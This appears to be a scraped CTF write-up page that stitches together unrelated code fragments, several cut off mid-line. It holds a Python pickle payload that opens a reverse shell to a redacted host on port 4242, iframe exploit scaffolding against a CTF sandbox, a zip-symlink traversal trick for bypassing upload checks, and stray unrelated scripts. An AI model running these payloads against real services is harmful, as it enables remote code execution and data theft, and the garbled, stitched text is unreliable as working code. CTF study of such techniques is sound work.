- CTFtime: https://ctftime.org/event/2441/
You can download challenge files from: smooth-note.tar.gz
Summary
You can download challenge files from: smooth-note.tar.gz
Summary
import pickle | |
import base64 | |
import requests | |
import json | |
import os | |
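class P(object):
    """Pickle payload object whose deserialisation runs a reverse-shell string.

    ``pickle`` records the ``(callable, args)`` pair returned by
    ``__reduce__`` and ``pickle.loads`` later calls ``callable(*args)``.
    Here the callable is ``exec`` and the argument is a Python one-liner, so
    any service that unpickles attacker-supplied bytes executes that code
    with the privileges of the unpickling process.

    Defensive notes:
      * Never pass untrusted bytes to ``pickle.loads``; use a data-only
        format such as JSON, or a ``pickle.Unpickler`` subclass whose
        ``find_class`` allow-lists the expected types (which would refuse
        ``builtins.exec``).
      * Runtime indicators of this payload are an outbound TCP connection
        from the application process followed by a ``/bin/bash`` child
        attached to a pty.
    """

    def __reduce__(self):
        # The host in the string ("xx.xx.xx.xx") appears to be redacted by the
        # author; the port is 4242. The string is inert data until an
        # unpickler invokes exec on it.
        return (exec, ('import socket,os,pty;s=socket.socket();s.connect(("xx.xx.xx.xx",4242));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")',))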
<body> | |
<iframe id="frame1"></iframe> | |
<iframe id="frame2"></iframe> | |
<script> | |
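/**
 * Interpret an array of byte values as one big-endian unsigned integer and
 * return that integer written in base 36.
 *
 * BigInt is used so that inputs longer than a few bytes do not lose
 * precision. An empty array yields "0" because the fold starts from zero.
 *
 * @param {ArrayLike<number>} arr byte values, most significant first
 * @returns {string} lowercase base-36 representation
 */
function arrayToBase36(arr) {
  const asInteger = arr.reduce(
    (acc, byte) => BigInt(256) * acc + BigInt(byte),
    BigInt(0)
  );
  return asInteger.toString(36);
}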
// Locate this file in https://storage.googleapis.com | |
const evaluatorHtml = ` | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
<title>Evaluator</title> | |
<script> | |
onmessage = e => { |
from http.server import HTTPServer | |
from http.server import BaseHTTPRequestHandler | |
import requests | |
import sys | |
import re | |
import base64 | |
import websocket | |
import time | |
import threading | |
import json |
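// Build a tab-separated export of the rows in #meisaiTable.
// Rows that carry an id attribute are skipped; for each remaining row the
// 2nd, 3rd and 8th cells are read as date, description and price, and all
// whitespace is stripped from the price.
// NOTE: `meisai` is assigned without a declaration, so it becomes an implicit
// global (and would throw in strict mode / an ES module).
meisai = [...document.querySelectorAll('#meisaiTable tbody tr')]
  .filter(tr => tr.id === '')
  .map(tr => [...tr.querySelectorAll('td')])
  .map(tds => {
    const date = tds[1].textContent
    const content = tds[2].textContent
    const price = tds[7].textContent.replaceAll(/\s/gi, '')
    // One line per row: date, description, an empty column, a fixed
    // payment-method label, then the price.
    return `${date}\t${content}\t\tクレジットカード:ANAゴールドカード\t${price}`
  })
  .join('\n')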
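To solve the challenge we need to upload a symlink inside a zip file.
When a zip file is uploaded, it is unzipped and any symlinks it contained are then deleted.
But if the entry name contains `../`, the symlink is not deleted.
Therefore we create a symlink entry named `foo/../bar` in the zip file.
An extractor that rejects symlink entries and entry names containing `..` before writing anything to disk would not be exposed to this.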
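# CloudFormation template: header and the first two parameters of the excerpt.
AWSTemplateFormatVersion: 2010-09-09
Description: A kick-ass cloud app for hacker movienights!
Parameters:
  # Application name; defaults to "api-movies".
  AppName:
    Type: String
    Default: api-movies
    Description: Name of application.
  # Stage name; defaults to "prod".
  StageName:
    Type: String
    Default: prod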
<body> | |
<script> | |
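// Promise-based delay: resolves after `time` milliseconds.
const sleep = (time) => new Promise((resolve) => setTimeout(resolve, time))

// First frame: loads shim.html from the sandbox origin, passing this page's
// origin in the `o` query parameter, and is attached to the document.
const frame = document.createElement('iframe');
frame.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`;
document.body.appendChild(frame);

// Second frame: same URL, but created with a `sandbox` attribute.
// The token list grants almost every allow-* permission (including
// allow-scripts together with allow-same-origin), so the attribute lifts
// most of the restrictions a bare `sandbox` would impose.
// NOTE(review): frame2 is not appended to the document within this excerpt.
const frame2 = document.createElement('iframe');
frame2.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`;
frame2.setAttribute('sandbox', 'allow-downloads allow-downloads-without-user-activation allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-same-origin allow-scripts allow-storage-access-by-user-activation allow-top-navigation allow-top-navigation-to-custom-protocols')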
from websocket import create_connection | |
from base64 import b64encode, b64decode | |
import pickle | |
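# Placeholder ticket value; presumably replaced with a real ticket before use.
ticket = 'ticket{}'
# Open a WebSocket to the local service, offering the ticket as the
# requested subprotocol. The URL uses plain ws:// (no TLS) on localhost.
ws = create_connection("ws://localhost:8081/ws/", subprotocols=[ticket])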
PICKLE_OP_NAMES = { | |
"MARK": '(', |